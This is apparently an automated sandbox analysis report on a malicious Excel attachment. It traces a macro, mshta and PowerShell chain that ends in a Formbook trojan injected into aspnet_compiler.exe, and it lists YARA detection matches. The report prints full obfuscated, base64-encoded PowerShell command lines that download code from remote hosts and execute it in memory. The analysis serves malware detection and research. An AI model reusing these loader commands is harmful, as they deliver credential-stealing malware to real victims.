              Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/H
              Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/L
              Source: mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp, PO#BBGR2411PO69.xls, 09230000.0.drString found in binary or memory: https://linkjago.me/RHCYXp?&damage=nasty
              Source: mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&s
              Source: mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/S
              Source: mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/r
              Source: mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/v
              Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
              Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
              Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
              Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2
              Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

              E-Banking Fraud

              Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: PO#BBGR2411PO69.xls OLE: Microsoft Excel 2007+
              Source: 09230000.0.dr OLE: Microsoft Excel 2007+
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Memory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0042C4A3 NtClose,27_2_0042C4A3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk,27_2_00A707AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6F9F0 NtClose,LdrInitializeThunk,27_2_00A6F9F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,27_2_00A6FAE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,27_2_00A6FB68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,27_2_00A6FDC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A700C4 NtCreateFile,27_2_00A700C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A70060 NtQuerySection,27_2_00A70060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A70078 NtResumeThread,27_2_00A70078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A70048 NtProtectVirtualMemory,27_2_00A70048
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A701D4 NtSetValueKey,27_2_00A701D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7010C NtOpenDirectoryObject,27_2_00A7010C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A70C40 NtGetContextThread,27_2_00A70C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A710D0 NtOpenProcessToken,27_2_00A710D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A71148 NtOpenThread,27_2_00A71148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6F8CC NtWaitForSingleObject,27_2_00A6F8CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A71930 NtSetContextThread,27_2_00A71930
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6F938 NtWriteFile,27_2_00A6F938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6F900 NtReadFile,27_2_00A6F900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FAB8 NtQueryValueKey,27_2_00A6FAB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FAD0 NtAllocateVirtualMemory,27_2_00A6FAD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FA20 NtQueryInformationFile,27_2_00A6FA20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FA50 NtEnumerateValueKey,27_2_00A6FA50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FBB8 NtQueryInformationToken,27_2_00A6FBB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FBE8 NtQueryVirtualMemory,27_2_00A6FBE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FB50 NtCreateKey,27_2_00A6FB50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FC90 NtUnmapViewOfSection,27_2_00A6FC90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FC30 NtOpenProcess,27_2_00A6FC30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FC60 NtMapViewOfSection,27_2_00A6FC60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FC48 NtSetInformationFile,27_2_00A6FC48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A71D80 NtSuspendThread,27_2_00A71D80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FD8C NtDelayExecution,27_2_00A6FD8C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FD5C NtEnumerateKey,27_2_00A6FD5C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FEA0 NtReadVirtualMemory,27_2_00A6FEA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FED0 NtAdjustPrivilegesToken,27_2_00A6FED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FE24 NtWriteVirtualMemory,27_2_00A6FE24
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FFB4 NtCreateSection,27_2_00A6FFB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FFFC NtCreateProcessEx,27_2_00A6FFFC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FF34 NtQueueApcThread,27_2_00A6FF34
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8304027_2_00A83040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A9905A27_2_00A9905A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0D13F27_2_00B0D13F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B2123827_2_00B21238
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7F3CF27_2_00A7F3CF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8735327_2_00A87353
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A9148927_2_00A91489
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AB548527_2_00AB5485
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00ABD47D27_2_00ABD47D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B235DA27_2_00B235DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8351F27_2_00A8351F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0579A27_2_00B0579A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AB57C327_2_00AB57C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B1771D27_2_00B1771D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B1F8EE27_2_00B1F8EE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AFF8C427_2_00AFF8C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0595527_2_00B05955
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0394B27_2_00B0394B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B33A8327_2_00B33A83
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0DBDA27_2_00B0DBDA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7FBD727_2_00A7FBD7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AA7B0027_2_00AA7B00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B1FDDD27_2_00B1FDDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0BF1427_2_00B0BF14
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AADF7C27_2_00AADF7C
              Source: PO#BBGR2411PO69.xls OLE indicator, VBA macros: true
              Source: 09230000.0.dr OLE indicator, VBA macros: true
              Source: PO#BBGR2411PO69.xlsStream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25
              Source: 09230000.0.drStream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00A7E2A8 appears 60 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00A7DF5C appears 137 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AEF970 appears 84 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AC373B appears 253 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AC3F92 appears 132 times
              Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.phis.troj.expl.evad.winXLS@31/36@11/4
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\09230000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8796.tmp
              Source: PO#BBGR2411PO69.xls OLE indicator, Workbook stream: true
              Source: 09230000.0.dr OLE indicator, Workbook stream: true
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: PO#BBGR2411PO69.xls Virustotal: Detection: 7%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
